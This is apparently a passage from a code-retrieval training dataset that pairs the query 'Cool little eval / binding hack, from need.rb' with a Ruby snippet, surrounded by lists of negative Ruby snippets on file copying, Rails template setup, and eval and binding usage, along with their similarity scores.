"def create_src_list\n\n if ENV['TM_PROJECT_DIRECTORY']\n\n src_list = (ENV['TM_AS3_USUAL_SRC_DIRS'] != nil) ? ENV['TM_AS3_USUAL_SRC_DIRS'].gsub(':','|') : \"src\"\n @src_dirs = `find -dE \"$TM_PROJECT_DIRECTORY\" -maxdepth 5 -regex '.*\\/(#{src_list})' -print 2>/dev/null`\n\n end\n\n cs = \"#{@completion_src}/data/completions\"\n\n # Check once for existence here as we will save repeated\n # checks later (whilst walking up the heirarchy).\n add_src_dir(\"#{cs}/intrinsic\")\n add_src_dir(\"#{cs}/frameworks/air\")\n add_src_dir(\"#{cs}/frameworks/flash_ide\")\n add_src_dir(\"#{cs}/frameworks/flash_cs3\")\n\n # Where we have access to the compressed flex 3 files use them,\n # otherwise go looking for the sdk.\n unless add_src_dir(\"#{cs}/frameworks/flex_3\")\n fx = FlexMate::SDK.src\n add_src_dir(fx) unless fx.nil?\n end\n\n #log_append( \"src_dirs \" + @src_dirs )\n\n end",
"def sources\n files(!p?)\n end",
"def write_source_file\n paths = []\n\n # Remove C:/\n install_dir = project.install_dir.split('/')[1..-1].join('/')\n\n # Grab all parent paths\n Pathname.new(install_dir).ascend do |path|\n paths << path.to_s\n end\n\n # Create the hierarchy\n hierarchy = paths.reverse.inject({}) do |hash, path|\n hash[File.basename(path)] = path.gsub(/[^[:alnum:]]/, '').upcase + 'LOCATION'\n hash\n end\n\n # The last item in the path MUST be named PROJECTLOCATION or else space\n # robots will cause permanent damage to you and your family.\n hierarchy[hierarchy.keys.last] = 'PROJECTLOCATION'\n\n # If the path hierarchy is > 1, the customizable installation directory\n # should default to the second-to-last item in the hierarchy. If the\n # hierarchy is smaller than that, then just use the system drive.\n wix_install_dir = if hierarchy.size > 1\n hierarchy.to_a[-2][1]\n else\n 'WINDOWSVOLUME'\n end\n\n render_template(resource_path('source.wxs.erb'),\n destination: \"#{staging_dir}/source.wxs\",\n variables: {\n name: project.package_name,\n friendly_name: project.friendly_name,\n maintainer: project.maintainer,\n hierarchy: hierarchy,\n\n wix_install_dir: wix_install_dir,\n }\n )\n end",
"def testUselessProcessesSourceFiles\n execute_Mix_WithConf({\n :WaveFiles => {\n :FilesList => [\n {\n :Name => 'Wave.wav'\n }\n ]\n },\n :Mix => {\n 'Final' => {\n :Tracks => {\n 'Wave.wav' => {\n :Processes => [\n {\n :Name => 'VolCorrection',\n :Factor => '2db'\n },\n {\n :Name => 'VolCorrection',\n :Factor => '-2db'\n }\n ]\n }\n }\n }\n }\n },\n :PrepareFiles => [\n [ 'Wave/Empty.wav', 'Wave.wav' ]\n ]) do |iStdOUTLog, iStdERRLog, iExitStatus|\n assert_exitstatus 0, iExitStatus\n assert Dir.glob('05_Mix/*.wav').empty?\n assert_wave_lnk 'Empty', '05_Mix/Final/Final.wav'\n end\n end",
"def addSrcFilesByRE(re)\n Dir.for_each(@srcDir) { |f|\n next if File.stat(f).dir?\n @files << f if re =~ f\n }\n end",
"def add_template_repository_to_source_path\n template_dir =\n if __FILE__ =~ %r{\\Ahttps?://}\n clone_repo\n else\n File.dirname(__FILE__)\n end\n\n source_paths.unshift(template_dir)\n puts \"*** source_paths: (#{source_paths.join(\" \")})\"\n puts \"*** template_dir: (#{template_dir})\"\n template_dir\nend",
"def add_template_repository_to_source_path\n template_dir =\n if __FILE__ =~ %r{\\Ahttps?://}\n clone_repo\n else\n File.dirname(__FILE__)\n end\n\n source_paths.unshift(template_dir)\n puts \"*** source_paths: (#{source_paths.join(\" \")})\"\n puts \"*** template_dir: (#{template_dir})\"\n template_dir\nend",
"def prepare_pester_tests\n info(\"Preparing to copy files from '#{suite_test_folder}' to the SUT.\")\n sandboxed_suites_path = File.join(sandbox_path, \"suites\")\n copy_if_src_exists(suite_test_folder, sandboxed_suites_path)\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"rails-template-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n \"--quiet\",\n \"https://github.com/RYLabs/rails-devcontainer-template.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{rails-devcontainer-template/(.+)/rails-postgres.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require 'tmpdir'\n source_paths.unshift(tempdir = Dir.mktmpdir('rails-templates'))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n '--quiet',\n 'https://github.com/brightoctopus/rails-templates.git',\n tempdir\n ].map(&:shellescape).join(' ')\n\n if (branch = __FILE__[%r{rails-templates/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def run\n return unless setup_compilable\n\n @collection.files.values.each do |pointer|\n compiled_file = File.join(@collection.compiled_path, pointer['id'])\n\n FileUtils.mkdir_p File.dirname(compiled_file)\n FileUtils.cp_r pointer['realpath'], compiled_file\n\n Ruhoh::Friend.say { green \" > #{pointer['id']}\" }\n end\n end",
"def source_paths\n Array(super) + [__dir__]\nend",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require 'tmpdir'\n source_paths.unshift(tempdir = Dir.mktmpdir('herewego-'))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n '--quiet',\n 'https://github.com/Sanchezdav/herewego.git',\n tempdir\n ].map(&:shellescape).join(' ')\n\n if (branch = __FILE__[%r{herewego/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def copy_file(*filters)\n\t\tadd_dep filters.map{|filter| File.join(@source_dir, filter)}\n\tend",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require 'tmpdir'\n require 'fileutils'\n require 'shellwords'\n source_paths.unshift(tempdir = Dir.mktmpdir('rails-template-'))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n '--quiet',\n 'https://github.com/shota-yamashita/rails-template.git',\n tempdir\n ].map(&:shellescape).join(' ')\n\n if (branch = __FILE__[%r{rails-template/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def add_vendor_files\n say_quietly \"Copying files...\"\n\n %w[auth backend frontend].each do |section|\n template \"vendor/assets/javascripts/archangel/#{section}.js\"\n template \"vendor/assets/stylesheets/archangel/#{section}.css\"\n end\n end",
"def cpp_includes\n\t\tselect {|x| x.class == CppInclude }\n\tend",
"def copy(files=[])\n files = ignore_stitch_sources files\n if files.size > 0\n begin\n message = 'copied file'\n message += 's' if files.size > 1\n UI.info \"#{@msg_prefix} #{message.green}\" unless @config[:silent]\n puts '| ' #spacing\n files.each do |file|\n if !check_jekyll_exclude(file)\n path = destination_path file\n FileUtils.mkdir_p File.dirname(path)\n FileUtils.cp file, path\n puts '|' + \" → \".green + path\n else\n puts '|' + \" ~ \".yellow + \"'#{file}' detected in Jekyll exclude, not copying\".red unless @config[:silent]\n end\n end\n puts '| ' #spacing\n\n rescue Exception\n UI.error \"#{@msg_prefix} copy has failed\" unless @config[:silent]\n UI.error e\n stop_server\n throw :task_has_failed\n end\n true\n end\n end",
"def assets_to_compile \n return @assets_to_compile if @assets_to_compile \n files = Dir.glob(prefix + \"**/*\").select {|f| File.file?(f)}\n files.collect! { |f| f.gsub(/^#{prefix}\\//, \"\") }\n end",
"def copy_skel_files(exclude = [])\n full_path = File.join(File.dirname(__FILE__), @skel)\n excluded = exclude.map {|x| \"#{full_path}/#{x}\" }\n Dir.glob(\"#{full_path}/**/*\").select {|x| File.directory?(x)}.each do |f|\n relative_path = f.gsub(/#{full_path}\\//, '')\n FileUtils.mkdir_p relative_path\n end\n (\n Dir.glob(\"#{full_path}/**/*\") + Dir.glob(\"#{full_path}/**/.*\") - excluded\n )\n .select {|x| File.file?(x)}.each do |f|\n next if f =~ /\\.gitkeep/\n relative_path = f.gsub(/#{full_path}\\//, '')\n FileUtils.cp f, relative_path\n end\n end",
"def IncludeCleanTargets(*includes)\n @ProjectFileLoader.CurrentlyLoadedProjectFile().CleanList.include(includes)\n end",
"def run\n return unless setup_compilable\n\n @collection.files.values.each do |pointer|\n compiled_file = File.join(@collection.compiled_path, pointer['id'])\n FileUtils.mkdir_p File.dirname(compiled_file)\n FileUtils.cp_r pointer['realpath'], compiled_file\n Ruhoh::Friend.say { green \" > #{pointer['id']}\" }\n end\n end",
"def keep_source_code_for_prebuilt_frameworks!\n DSL.dont_remove_source_code = true\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n p \"!!!!!!!!!!!!!!!!!!!!\"\n p \"!!!!!!!!!!!!!!!!!!!!\"\n p \"!!!!!!!!!!!!!!!!!!!!\"\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"rails-template-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git :clone => [\n \"--quiet\",\n \"https://github.com/velpradeep/react-rails-template-app.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{rails-template/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git :checkout => branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def _inter source\n c = compile source\n cifrom c\nend",
"def included_sources=(value)\n @included_sources = value\n end",
"def copy_source\n directory('webpack', self.target_path, {\n recursive: true\n })\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"rails-template-\"))\n at_exit {FileUtils.remove_entry(tempdir)}\n git clone: [\n \"--quiet\",\n \"https://github.com/sherllochen/rails-template.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{rails-template/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) {git checkout: branch}\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def compile!\n new_version = generate_version\n new_abs_path = abs_path(new_version)\n return @compiled_path = current_file_path if @compile_files.empty?\n\n FileUtils.mkdir_p @min_dir unless File.exist?(@min_dir)\n js? ? compile_js!(new_abs_path) : compile_css!(new_abs_path)\n\n if not_changed?(new_abs_path, current_abs_path)\n puts \"file not changed, use current file (#{current_file_path})\"\n FileUtils.rm_rf new_abs_path\n @compiled_path = current_file_path\n else\n puts \"new file version (#{file_path(new_version)}) created\"\n @compiled_path = file_path(new_version)\n end\n end",
"def lib_files\n @files.select do |file|\n require_paths.any? do |path|\n file.start_with? path\n end\n end\n end",
"def copy_source\n copy_source_tree('source')\n return unless Dir.exist?(\"#{@build_dir}/source/debian\")\n\n FileUtils.rm_rf(Dir.glob(\"#{@build_dir}/source/debian\"))\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require 'tmpdir'\n\n source_paths.unshift(tempdir = Dir.mktmpdir(DIR_NAME + '-'))\n at_exit { FileUtils.remove_entry(tempdir) }\n run(\"git clone --quiet #{GITHUB_PATH.shellescape} #{tempdir.shellescape}\")\n\n if (branch = __FILE__[%r{#{DIR_NAME}/(.+)/bridgetown.automation.rb}, 1])\n Dir.chdir(tempdir) { system(\"git checkout #{branch}\") }\n @current_dir = File.expand_path(tempdir)\n end\n else\n source_paths.unshift(DIR_NAME)\n end\nend",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require 'tmpdir'\n source_paths.unshift(tempdir = Dir.mktmpdir('rails-template-'))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n '--quiet',\n 'https://github.com/leikir/rails-template.git',\n tempdir\n ].map(&:shellescape).join(' ')\n\n if (branch = __FILE__[%r{rails-template/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def include(*files)\n @include += files.flatten\n self\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"ngrok_rails_template-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n \"--quiet\",\n \"https://github.com/captproton/ngrok_rails_template.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{ngrok_rails_template/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def copy_source\n copy_source_tree('source')\n return unless Dir.exist?(\"#{@build_dir}/source/debian\")\n FileUtils.rm_rf(Dir.glob(\"#{@build_dir}/source/debian\"))\n end",
"def execute\n\n copiedCounter = 0\n failedCounter = 0\n skippedCounter = 0\n \n # traverse all srcfiles\n FiRe::filesys.find(@source) { |srcItem|\n \n # give some feedback\n FiRe::log.info \"searching #{srcItem}...\" if FiRe::filesys.directory?(srcItem)\n \n # skip this subtree if it matches ignored-items\n FiRe::filesys.prune if ignore?(srcItem) \n \n # transform srcpath to destpath\n destItem = srcItem.gsub(@source, @destination)\n\n # do not copy if item already exists and looks OK\n if needCopy(destItem,srcItem)\n copyWentWell = copyItem(srcItem, destItem)\n copiedCounter += 1 if copyWentWell\n failedCounter += 1 if !copyWentWell\n else\n skippedCounter += 1 \n end\n \n }\n \n # give some feedback\n FiRe::log.info \"copied #{copiedCounter} items, while #{failedCounter} items failed. #{skippedCounter} items did not need to be copied today.\"\n\n end",
"def move_files_if(src_files, dst_dir = nil)\n Dir[src_files].each do |srcfile|\n cp_action = 0\n dst_dir = File.dirname(src_files).gsub(TMPDIR, '').gsub(/^\\//, '') if dst_dir == nil\n dst_dir << \"/\" unless dst_dir =~ /\\/$/\n dstfile = \"#{dst_dir}#{File.basename(srcfile)}\"\n\n # check if exists similar one in hdl/ directory\n if !File.file? dstfile\n cp_action = 1\n # if exists but differs\n elsif !FileUtils.identical?(dstfile, srcfile) then\n \n puts \"-\" * 43 << \"existing one\" << \"-\" * 44 << '|' << \"-\" * 44 << \"generated\" << \"-\" * 43 << \"\\n\" \n puts %x{diff -y -W200 #{dstfile} #{srcfile} | less }\n puts \"-\" * 200\n print \"Use generated file #{File.basename(srcfile)}? [Y/N] \"\n if $stdin.gets =~ /y/i\n cp_action = 2\n end\n end\n if cp_action > 0\n FileUtils.mkdir_p(dst_dir) unless File.directory? dst_dir\n FileUtils.cp srcfile, dstfile\n if cp_action == 1\n printf(\"%5s %20s %s\\n\",\"\", \" new file added:\", dstfile)\n else\n printf(\"%20s %s\\n\",\" overwrited:\", dstfile)\n end\n end\n end\nend"
] |
[
"0.67724407",
"0.67555416",
"0.6641602",
"0.6449673",
"0.64423573",
"0.62240994",
"0.6183724",
"0.61246365",
"0.60495454",
"0.60196936",
"0.5957298",
"0.5891985",
"0.5861465",
"0.5851464",
"0.5845209",
"0.5845209",
"0.5802774",
"0.5775919",
"0.5772304",
"0.5753653",
"0.57510734",
"0.57510734",
"0.57510734",
"0.57510734",
"0.5746681",
"0.5740522",
"0.57154465",
"0.57028556",
"0.56908774",
"0.5631118",
"0.5598227",
"0.5586816",
"0.5586086",
"0.5569788",
"0.55472755",
"0.5530377",
"0.5525126",
"0.5525126",
"0.5525126",
"0.5525126",
"0.5525126",
"0.5525126",
"0.55192375",
"0.55191994",
"0.55191994",
"0.55191994",
"0.55188227",
"0.5514686",
"0.5498889",
"0.5497935",
"0.54946816",
"0.54934716",
"0.5482614",
"0.5482445",
"0.5482264",
"0.5476146",
"0.5461472",
"0.5461472",
"0.5458605",
"0.54567087",
"0.5447649",
"0.54470086",
"0.54445493",
"0.54434556",
"0.54419094",
"0.541466",
"0.541208",
"0.54082006",
"0.54082006",
"0.5399759",
"0.53975713",
"0.5395501",
"0.53943926",
"0.53939366",
"0.53859156",
"0.53835857",
"0.5381881",
"0.53799015",
"0.5378647",
"0.53713346",
"0.536134",
"0.53608924",
"0.5356689",
"0.5354662",
"0.53545934",
"0.5351937",
"0.53500986",
"0.5349617",
"0.53485966",
"0.5347694",
"0.5347208",
"0.53468096",
"0.5345108",
"0.5344331",
"0.53434837",
"0.53426576",
"0.53426117",
"0.5338031",
"0.5335797",
"0.5333946"
] |
0.7868463
|
0
|
Cool little eval / binding hack, from need.rb
|
def build_working_dir(&block)
file_name =
if block.respond_to?(:source_location)
block.source_location[0]
else
eval("__FILE__", block.binding)
end
@working_dir = File.expand_path(
File.join(File.dirname(file_name), "generated"))
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def foo2 my_binding\n eval \"x\", my_binding\nend",
"def foo my_binding\n x = 200\n eval \"x\", my_binding\nend",
"def eval_binding(args, current_cont)\n\t\t\tname, env = args[:name], args[:env]\n\t\t\tif env.include? name.val.to_sym\n\t\t\t\treturn current_cont.next_with(ast: env[name.val.to_sym])\n\t\t\telse\n\t\t\t\tif env.parent\n\t\t\t\t\t# TODO: check if copy_with is necessary\n\t\t\t\t\treturn current_cont.with name: name, env: env.parent\n\t\t\t\telse\n\t\t\t\t\treturn current_cont.heap[:error_handler].with message: \n\t\t\t\t\t\t\"Could not resolve symbol #{name.val.inspect}\",\n\t\t\t\t\t\tast: name, backtrace: caller(0)\n\t\t\t\tend\n\t\t\tend\n\t\tend",
"def bound_eval(source)\n self.generate_binding.eval source\n end",
"def evaluator(str,binding)\n a_value = 123\n eval(str,binding) #outputs 321\nend",
"def __eval_binding\n RUBY_VERSION < \"1.9\" ? binding : ::Kernel.binding\n end",
"def eval(*args); end",
"def eval(string, binding=nil, filename=nil, lineno=1)\n if binding\n if binding.kind_of? Proc\n binding = binding.binding\n elsif binding.respond_to? :to_binding\n binding = binding.to_binding\n end\n\n unless binding.kind_of? Binding\n raise ArgumentError, \"unknown type of binding\"\n end\n\n # shortcut for checking for a local in a binding!\n # This speeds rails up quite a bit because it uses this in rendering\n # a view A LOT.\n #\n # Rails always does this passing in a binding, so thats why the check\n # is here.\n #\n # TODO eval the AST rather than compiling. Thats slightly slower than\n # this, but handles infinitely more cases.\n=begin\n if m = /^\\s*defined\\? ([a-z_][A-Za-z0-9_]*)\\s*$/.match(string)\n local = m[1].to_sym\n if binding.variables.local_defined?(local)\n return \"local-variable\"\n else\n return nil\n end\n end\n=end\n\n filename ||= binding.static_scope.active_path\n passed_binding = true\n else\n binding = Binding.setup(Rubinius::VariableScope.of_sender,\n Rubinius::CompiledMethod.of_sender,\n Rubinius::StaticScope.of_sender)\n\n filename ||= \"(eval)\"\n passed_binding = false\n end\n\n cm = Rubinius::Compiler.compile_eval string, binding.variables, filename, lineno\n\n cm.scope = binding.static_scope.dup\n cm.name = :__eval__\n\n # This has to be setup so __FILE__ works in eval.\n script = Rubinius::CompiledMethod::Script.new(cm, filename, true)\n script.eval_binding = binding\n script.eval_source = string\n\n cm.scope.script = script\n\n be = Rubinius::BlockEnvironment.new\n be.under_context binding.variables, cm\n\n # Pass the BlockEnvironment this binding was created from\n # down into the new BlockEnvironment we just created.\n # This indicates the \"declaration trace\" to the stack trace\n # mechanisms, which can be different from the \"call trace\"\n # in the case of, say: eval(\"caller\", a_proc_instance)\n if binding.from_proc?\n be.proc_environment = binding.proc_environment\n end\n\n be.from_eval!\n \n yield cm, be if block_given?\n\n if passed_binding\n be.call\n else\n be.call_on_instance(self)\n end\n end",
"def binding() end",
"def binding() end",
"def eval(expr, *rest) end",
"def _binding() binding end",
"def _binding() binding end",
"def eval(ctx: nil, **kwargs)\n ctx ||= Context.default\n bind(ctx, kwargs).forward\n end",
"def silent_eval(str, binding = T.unsafe(nil)); end",
"def get_binding(str)\n binding\nend",
"def result(_binding=TOPLEVEL_BINDING)\n eval @src, _binding\n end",
"def result(_binding=TOPLEVEL_BINDING)\n eval @src, _binding\n end",
"def bind; binding() end",
"def _target\r\n Binding.of_caller do |b|\r\n assert_equal \"foo\", b[:x]\r\n assert_equal 33, b[:y]\r\n assert_equal ['x', 'y'], b.local_variables.sort\r\n assert_equal \"foo!\", b.eval('x + y.chr')\r\n b[:x].upcase!\r\n b[:y] *= -1\r\n assert_equal \"FOO\", b[:x]\r\n assert_equal -33, b[:y]\r\n assert_equal 'local-variable', b.defined?(:y)\r\n assert_equal nil, b.defined?(:foobar)\r\n end\r\n end",
"def _eval(exp, env)\n if list?(exp)\n if special_form?(exp)\n eval_special_form(exp, env) # [:lam, [:x, :y], [:+, :x, :y]], {} => [:closure, [:x, :y], [:+, :x, :y], {}]\n else\n fun = _eval(car(exp), env) # [[:lam, [:x, :y], [:+, :x, :y]], 3, 2] => [:closure, [:x, :y], [:+, :x, :y], {}]\n args = eval_list(cdr(exp), env) # [[:lam, [:x, :y], [:+, :x, :y]], 3, 2] => [3, 2]\n apply(fun, args) # [:closure, [:x, :y], [:+, :x, :y], {}], [3, 2] =>\n end\n else # exp := :x or :+ or 1\n if immediate_val?(exp) # 1\n exp\n else # :x or :+\n e = lookup_primitive_fun(exp) || lookup_var(exp, env)\n # :+ => [:prim, lambda { |x,y| x + y }]\n # :x, {x: 1, y: 2} => 1\n end\n end\nend",
"def _eval(m, env)\n\t\t@count+=1\n\t\tif m.is_a? Symbol\n\t\t\treturn env[m]\n \t\telsif !m.is_a? Array\n \t\t\treturn m\n \t\tend\n\t\tcase m[0]\n\t\twhen :lambda\n\t\t\t__, x, m1 = m[0], [m[1]], [m[2]]\n\t\t\tProc.new{|*clos| _eval(m1, Env.new(x, clos, env))}\n\t\telse\n\t\t\texprs = m.map { |expr| _eval(expr, env)}\n\t\t\treturn exprs[0] if !exprs[0].is_a? Proc\n\t\t\texprs[0].call(*exprs[1..-1])\n\t\tend\n\tend",
"def eval(_)\n value\n end",
"def create_binding(variable_to_value_hash) \n current_binding = binding\n for variable in variable_to_value_hash.keys\n eval \"#{variable.to_s} = variable_to_value_hash[variable]\", binding\n current_binding = binding\n end\n current_binding\nend",
"def get_a_binding\n val = 123\n binding\nend",
"def get_a_binding\n\tval = 123\n\tbinding\nend",
"def _run (expr)\n _ruby_eval expr\n end",
"def eval(string, binding=nil, filename=\"(eval)\", lineno=1)\n if !binding\n binding = Binding.setup(VariableScope.of_sender,\n CompiledMethod.of_sender,\n StaticScope.of_sender)\n\n elsif binding.__kind_of__ Proc\n binding = binding.binding\n elsif !binding.__kind_of__ Binding\n raise ArgumentError, \"unknown type of binding\"\n end\n\n context = Compiler::Context.new binding.variables, binding.code\n\n compiled_method = Compiler::Utils.compile_string string, context, filename, lineno\n compiled_method.scope = binding.static_scope\n compiled_method.name = :__eval__\n\n yield compiled_method if block_given?\n\n # This has to be setup so __FILE__ works in eval.\n script = CompiledMethod::Script.new\n script.path = filename\n compiled_method.scope.script = script\n\n # Internalize it now, since we're going to springboard to it as a block.\n compiled_method.compile\n\n be = BlockEnvironment.new\n be.under_context binding.variables, compiled_method\n\n # Pass the BlockEnvironment this binding was created from\n # down into the new BlockEnvironment we just created.\n # This indicates the \"declaration trace\" to the stack trace\n # mechanisms, which can be different from the \"call trace\"\n # in the case of, say: eval(\"caller\", a_proc_instance)\n if binding.from_proc? then\n be.proc_environment = binding.proc_environment\n end\n\n be.from_eval!\n be.call\n end",
"def f\n x = 3\n b = binding()\n b\nend",
"def local_binding\n binding\n end",
"def current_eval(string, ebinding=Mission.eval_binding)\n ebinding = ebinding.call if ebinding.is_a?(Proc)\n eval(string, ebinding)\n end",
"def context_for_eval; end",
"def evaluate(scope, locals, &block); end",
"def bind\n binding\n end",
"def eval_expression\n eval(expression, binding)\n end",
"def eval(str)\n end",
"def get_binding\n a = 123\n binding\nend",
"def eval(env)\n env.variable_get(self)\n end",
"def invoke(*values, &proc)\n if values.first.is_a? Binding\n bind = values.shift\n else\n bind = Kernel.binding()\n end\n rewritten_sexp = rewrite_sexp(proc.to_sexp, values)\n ruby = generate_ruby(rewritten_sexp)\n p ruby\n rewritten_proc = eval(ruby, bind)\n super(values, &rewritten_proc)\n end",
"def eval\n yield self\n end",
"def eval\n execute\n end",
"def bind(p0) end",
"def bind(p0) end",
"def compile(wrap: :proc, bind: BindingHelper.empty_binding, locals: nil, pre: nil, post: nil, context_name: '_context')\n\t\t\t\tsrc=@src\n\t\t\t\tsrc=BindingHelper.local_extraction(locals, context_name: context_name)+src if locals\n\t\t\t\tsrc=pre+\"\\n\"+src if pre\n\t\t\t\tsrc<< post+\"\\n\" if post\n\t\t\t\tto_eval=case wrap\n\t\t\t\t\twhen :eval; @src\n\t\t\t\t\twhen :lambda; \"lambda { |#{context_name}| #{src} }\"\n\t\t\t\t\twhen :proc; \"Proc.new { |#{context_name}| #{src} }\"\n\t\t\t\t\twhen :module; \"Module.new { |#{context_name}| #{src} }\"\n\t\t\t\t\twhen :unbound\n\t\t\t\t\t\t#wrapping in a method allows us to pass a block to a code\n\t\t\t\t\t\t#calling yield\n\t\t\t\t\t\trequire 'dr/ruby_ext/meta_ext'\n\t\t\t\t\t\treturn Meta.get_unbound_evalmethod('eruby', src, args: context_name)\n\t\t\t\t\twhen :unbound_instance\n\t\t\t\t\t\t#here we wrap in a method that the calls instance_eval\n\t\t\t\t\t\trequire 'dr/ruby_ext/meta_ext'\n\t\t\t\t\t\treturn Meta.get_unbound_evalmethod('eruby', <<-RUBY, args: context_name)\n\t\t\t\t\t\t\tself.instance_eval do\n\t\t\t\t\t\t\t\t#{src}\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\tRUBY\n\t\t\t\t\twhen :string\n\t\t\t\t\t\tsrc.to_s\n\t\t\t\t\telse \n\t\t\t\t\t\twarn \"wrap meth #{warn} not understood, defaulting to String\"\n\t\t\t\t\t\tsrc\n\t\t\t\t\tend\n\t\t\t\treturn eval(to_eval, bind, \"(wrap #{@filename})\")\n\t\t\tend",
"def eval(*args) # :nodoc:\n Evaler.eval(args[0], *args)\n end",
"def eval_ex(e)\n case e\n when Symbol\n value = @var_tables.reverse_each.find{|var| break var[e] if var[e] }\n raise \"undefined variable: #{e}\" if value.nil?\n return value\n when Array\n method = e.first\n case method\n when :if0\n if0(e[1], e[2], e[3])\n when :fold\n fold(e[1], e[2], e[3])\n when *OP1\n send(method, e[1])\n when *OP2\n send(method, e[1], e[2])\n else\n raise \"unexpected expression method: #{method.inspect}\"\n end\n when Numeric\n e\n else\n raise \"unexpected expression: #{e.inspect}\"\n end\n end",
"def bind_with_indifference(obj)\n bind_without_indifference(obj) rescue class << obj; self end.class_eval(to_s(:ruby))\n end",
"def as_proc(bind=nil)\n args_ext = self.args.map { |e| \"#{e} = fd[\\\"#{e}\\\"];\" }\n code = \"Proc.new do |fd|; #{args_ext.join \" \"} #{self.to_code}; end\"\n if bind # All objects have eval value, we bind when not nil\n # CAS::Help.assert(bind, Binding)\n bind.eval(code)\n else\n eval(code)\n end\n end",
"def bind(*) end",
"def e *args\n do_conn(:eval, *args).to_ruby\n end",
"def get_binding\r\n binding()\r\n end",
"def dynamic=(_arg0); end",
"def get_binding(param)\n binding\nend",
"def binder=(_arg0); end",
"def recipe(name)\n eval(RECIPE, binding, __FILE__, RECIPE_LINE)\n nil\nend",
"def eval(tokens, env)\n\tif tokens.is_a? Symbol # variable reference\n\t\treturn env[tokens]\n\telsif !tokens.is_a? Array #constant literal\n\t\treturn tokens\n\telsif tokens[0] == :quote #quote expression\n\t\t_, exp = tokens \n\t\treturn exp\n\telsif tokens[0] == :if\t\t\t#if test conseq alt\n\t\t_, test, conseq, alt = tokens\n\t\treturn eval(eval(test, env) ? conseq : alt, env)\n\telsif tokens[0] == :define #define var exp\n\t\tenv[tokens[1]] = eval(tokens[2], env)\n#\telsif tokens[0] == \"set!\" #set \n#\t\tenv.set(x[1], eval(x[2], env))\n\telsif tokens[0] == :lambda #set user-defined procedure\n\t\t_, params, body = tokens\n\t\treturn procedure(params, body, env)\n\telse\n\t\tproc = eval(tokens[0],env)\t#collect the operator to evaluate\n\t\targs = []\n\t\tfor exp in tokens[1..-1] do \n\t\t\targs.push(eval(exp, env))\t#collect arguments\n\t\tend\n\t\tvalue =\tproc.call *args[0..-1]\n\t\treturn value\n\tend\nend",
"def value_in_binding(tp, key, &block)\n tp.binding.eval(key.to_s)\n rescue NameError, ArgumentError\n yield if block_given?\n end",
"def resolve_and_eval(env)\n res = self.resolve(env)\n res.is_a?(Crisp::Nodes::Operation) ? res.eval(env) : res\n end",
"def bind_to_object=(_arg0); end",
"def __ken_binding\n self.class.class_eval {remove_method :__ken_binding}\n binding\nend",
"def call(bind_vars={}, &block)\n bind(bind_vars).run(&block)\n end",
"def warning_eval(str, binding = T.unsafe(nil)); end",
"def run _obj, _binding = nil\n @template.placeholders.each do |ph|\n proc = instance_variable_get(\"@proc_for_#{ph}\".to_sym)\n @template.send(\"#{ph}=\",proc.call(_obj))\n end\n @template.execute \n end",
"def evalObjectArgument _obj, _args\n \"_obj evalObjectArgument _args;\" \n end",
"def eval script\n # native function. this stub is for documenting only\n end",
"def bb_eval(str, b = get_binding)\n b.eval(str)\n rescue StandardError, ScriptError => e\n at = e.backtrace\n locations = []\n locations << \"#{at.shift}: #{e.class} Exception(#{e.message})\"\n locations += at.map { |path| \"\\tfrom #{path}\" }\n\n errmsg(pr('eval.exception', text_message: locations.join(\"\\n\")))\n nil\n end",
"def test_can_call_lambda_w_symbol_derefed_in_object\n result = interpret 'a=~{foo: ->() {9}};%a[foo:]'\n assert_eq result, 9\n end",
